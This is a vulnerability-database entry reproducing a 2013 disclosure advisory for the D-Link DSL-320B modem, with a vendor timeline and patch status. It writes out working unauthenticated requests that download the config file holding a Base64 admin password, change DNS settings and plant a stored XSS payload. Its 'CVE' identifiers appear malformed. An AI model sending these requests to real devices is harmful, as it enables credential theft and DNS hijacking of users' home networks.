ID
VAR-E-201305-0424
EDB ID
25251
TITLE
D-Link DSL-320B - Multiple Vulnerabilities - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
D-Link DSL-320B - Multiple Vulnerabilities. CVE-93020CVE-93019CVE-93018CVE-93014CVE-93013 . webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | d link | model: | dsl-320b | scope: | - | version: | - | Trust: 1.6 |
EXPLOIT
Device: DSL-320B
Firmware Version: EU_DSL-320B v1.23 date: 28.12.2010
Vendor URL: http://www.dlink.com/de/de/home-solutions/connect/modems-and-gateways/dsl-320b-adsl-2-ethernet-modem
============ Vulnerability Overview: ============
* Access to the Config file without authentication => full authentication bypass possible! :): (1)
192.168.178.111/config.bin
===<snip>====
<sysUserName value="admin"/>
<zipb enable="1"/>
<dns dynamic="disable" primary="1.1.1.1" secondary="2.2.2.3" domain="Home" host="alpha"/>
<sysPassword value="dGVzdA=="/>
===<snip>====
=> sysPassword is Base64 encoded
* Access to the logfile without authentication: (1)
192.168.178.111/status/status_log.sys
* Change the DNS Settings without authentication: (1)
http://192.168.178.111/advanced/adv_dns.xgi?&SET/dns/mode=0&SET/dns/mode/server/primarydns=1.1.1.1&SET/dns/mode/server/secondarydns=2.2.2.2
* Stored XSS within parental control (2):
=> Parameter: set/bwlist/entry:1/hostname
Request:
http://192.168.178.111/home/home_parent.xgi?&set/bwlist/enable=1&set/bwlist/bw_status=0&set/bwlist/entry:1/bw_flag=0&set/bwlist/entry:1/hostname=%22%3E%3Cimg%20src=%220%22%20onerror=alert(1)%3E&set/bwlist/entry:1/weekday=6&set/bwlist/entry:1/begintime=00:00&set/bwlist/entry:1/endtime=23:59&set/bwlist/entry:1/store=1&set/bwlist/apply=1
Again you are able to place this XSS without authentication. :)
* Login Credentials in HTTP GET are not a good idea => use HTTP Post! (3)
http://192.168.178.111/login.xgi?user=admin&pass=admin1
* Credentials in HTTP GET via password change request are not a good idea => use HTTP Post!: (3)
http://192.168.178.111/tools/tools_admin.xgi?&set/sys/account/user/oldpwd=admin&set/sys/account/user/password=test&CMT=1
============ Solution ============
Update to firmware version 1.25:
(1) - fixed
(2) - not fixed but authentication needed
(3) - not fixed
============ Credits ============
The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de/advisories
Twitter: @s3cur1ty_de
============ Time Line: ============
17.03.2012 - discovered vulnerabilities
17.03.2013 - informed vendor about the vulnerabilities
25.04.2013 - tested beta version from vendor
30.04.2013 - vendor releases patch
06.05.2013 - public disclosure
===================== Advisory end =====================
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Multiple Vulnerabilities
Trust: 1.6
CREDITS
m-1-k-3
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 25251 | Trust: 1.6 |
| db: | EDBNET | id: | 47275 | Trust: 0.6 |
REFERENCES
| url: | http://www.s3cur1ty.de/advisories | Trust: 1.0 |
| url: | https://www.exploit-db.com/exploits/25251/ | Trust: 0.6 |
SOURCES
| db: | EXPLOIT-DB | id: | 25251 |
| db: | EDBNET | id: | 47275 |
LAST UPDATE DATE
2022-07-27T10:03:16.765000+00:00
SOURCES RELEASE DATE
| db: | EXPLOIT-DB | id: | 25251 | date: | 2013-05-06T00:00:00 |
| db: | EDBNET | id: | 47275 | date: | 2013-05-06T00:00:00 |